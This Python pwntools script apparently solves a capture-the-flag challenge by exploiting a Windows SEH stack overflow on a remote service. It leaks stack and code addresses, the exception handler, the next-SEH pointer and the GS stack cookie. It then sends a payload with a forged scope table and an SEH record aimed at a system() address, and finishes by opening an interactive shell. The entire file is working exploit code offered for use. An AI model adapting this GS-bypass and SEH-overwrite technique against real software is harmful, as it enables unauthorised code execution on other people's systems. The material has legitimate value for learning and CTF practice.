from pwn import *
context.log_level = 'debug'

p = remote('192.168.1.10','10000')

#pause()

p.recvuntil('stack address = ')
stack_addr = int(p.recvline(),16)
p.recvuntil('main address = ')
main_addr = int(p.recvline(),16)

print(hex(stack_addr))
print(hex(main_addr))
ebp = stack_addr + 0x9c
system_addr = main_addr + 0x2dd

#leak ExceptionHandler
p.sendlineafter('Do you want to know more?','yes')
p.sendlineafter('Where do you want to know',str(ebp-0x0c))
p.recvuntil('value is ')
exhandle = int(p.recvline()[:-2],16)
#leak Next
p.sendlineafter('Do you want to know more?','yes')
p.sendlineafter('Where do you want to know',str(ebp-0x10))
p.recvuntil('value is ')
nextex = int(p.recvline()[:-2],16)
#leak GS
p.sendlineafter('Do you want to know more?','yes')
p.sendlineafter('Where do you want to know',str(ebp-0x1c))
p.recvuntil('value is ')
gs = int(p.recvline()[:-2],16)

Scope_Table = p32(0xFFFFFFE4) + p32(0) + p32(0xFFFFFF20) + p32(0) + p32(0) + p32(system_addr) + p32(system_addr)
Scope_Table_addr = stack_addr + 4

payload = b'aaaa' + Scope_Table + b'b'*(0x9c-0x1c-20-12) + p32(gs) + b'cccc' + p32(0) + p32(nextex) + p32(exhandle) + p32(gs^Scope_Table_addr^ebp) + p32(0)
p.sendlineafter('Do you want to know more?','exp')
p.sendline(payload)

p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.sendline('0')
p.interactive()